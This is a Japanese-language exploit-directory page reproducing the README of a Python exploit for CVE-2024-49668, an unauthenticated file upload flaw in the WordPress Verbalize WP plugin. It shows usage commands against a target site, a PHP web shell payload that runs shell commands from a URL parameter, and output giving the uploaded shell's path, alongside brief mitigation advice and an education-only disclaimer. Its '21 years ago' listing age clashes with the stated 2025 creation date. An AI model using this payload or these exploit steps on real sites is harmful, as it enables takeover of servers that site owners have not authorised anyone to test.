Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2024-49668 — WordPress Verbalize WP プラグイン <= 1.0 - 任意ファイルアップロードの脆弱性 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2024-49668
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育
GitHubnxploited/cve-2024-49668

CVE-2024-49668

WordPress Verbalize WP プラグイン <= 1.0 - 任意ファイルアップロードの脆弱性

リポジトリを見る
21年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

🚨 CVE-2024-49668: WordPress Verbalize WP プラグイン任意ファイルアップロード脆弱性

📋 概要

CVE-2024-49668 は、WordPress の Verbalize WP プラグインバージョン 1.0 以下における重大な脆弱性です。この脆弱性により、認証されていない攻撃者が Web シェルを含む任意のファイルを Web サーバーにアップロードできます。この問題は、ファイルアップロード時の入力検証とファイルタイプ制限が不十分であるために発生します。

詳細

  • 公開日: 2024-10-23
  • 更新日: 2024-10-23
  • タイトル: WordPress Verbalize WP プラグイン <= 1.0 - 任意ファイルアップロードの脆弱性
  • 説明: Admin Verbalize WP Upload の Web サーバーへの Web シェルアップロードにおける、危険なタイプのファイルの無制限アップロードの脆弱性です。この問題は Verbalize WP の n/a から 1.0 までに影響します。
  • CWE: CWE-434: 危険なタイプのファイルの無制限アップロード
  • CVSS スコア: 10.0 (緊急)
  • ベクタ文字列: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

🛠️ エクスプロイトスクリプト

この Python スクリプトは CVE-2024-49668 の脆弱性を悪用して、Verbalize WP プラグインを使用している対象の WordPress サイトにシェルファイルをアップロードします。

機能

  • 自動脆弱性チェック: スクリプトは readme.txt 内のプラグインバージョンを確認することで、対象サイトが脆弱かどうかを検証します。
  • ファイルアップロード: PHP シェルファイルを対象サイトにアップロードします。
  • パス抽出: アップロードされたシェルファイルへの完全なパスを抽出して表示します。

🧰 必要条件

  • Python 3.x
  • requests ライブラリ

必要なライブラリを pip でインストールします:

root@kitploit:~
pip install requests

🚀 使用方法

root@kitploit:~
usage: 
CVE-2024-49668.py [-h] -u URL [-s SHELL]

Execute a POST request to a WordPress site.

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target URL
  -s, --shell SHELL  Shell code to upload

使用例

デフォルトでは、スクリプトは phpinfo() を実行する PHP シェルをアップロードします。

root@kitploit:~
python CVE-2024-49668.py -u http://target.com

アップロードするカスタム PHP シェルコードを指定することもできます:

root@kitploit:~
python CVE-2024-49668.py -u http://target.com -s "<?php system($_GET['cmd']); ?>"

📄 スクリプト出力

root@kitploit:~
The site is vulnerable. Exploiting version: 1.0. Uploading file...
Shell path: /wp-content/uploads/audio-text/4091/audio-demo.php
Exploit By: Nxploit, Khaled ALenazi

📚 追加情報

脆弱性の影響

CVE-2024-49668 の脆弱性により、攻撃者は悪意のあるファイルをアップロードして対象サーバーを完全に制御できるようになります。この脆弱性を悪用すると、データ漏洩、不正アクセス、Web サイトの改ざんの可能性など、深刻な結果を招く恐れがあります。

緩和策のベストプラクティス

この脆弱性から WordPress サイトを保護するには、以下を推奨します:

  • Verbalize WP プラグインを、この問題に対処した最新バージョンに更新する。
  • ファイルタイプとサイズを制限する強力なファイルアップロード検証を実装する。
  • 不審な活動がないかサーバーログを定期的に監視する。

法的免責事項

このツールは教育目的のみを対象としています。所有者の明示的な許可なしに Web サイトに対してこのツールを不正使用することは違法です。著者は、このツールによって引き起こされた誤用や損害について一切の責任を負いません。


2025-03-22 に Nxploited , Khaled alenazi によって作成

ツールをダウンロード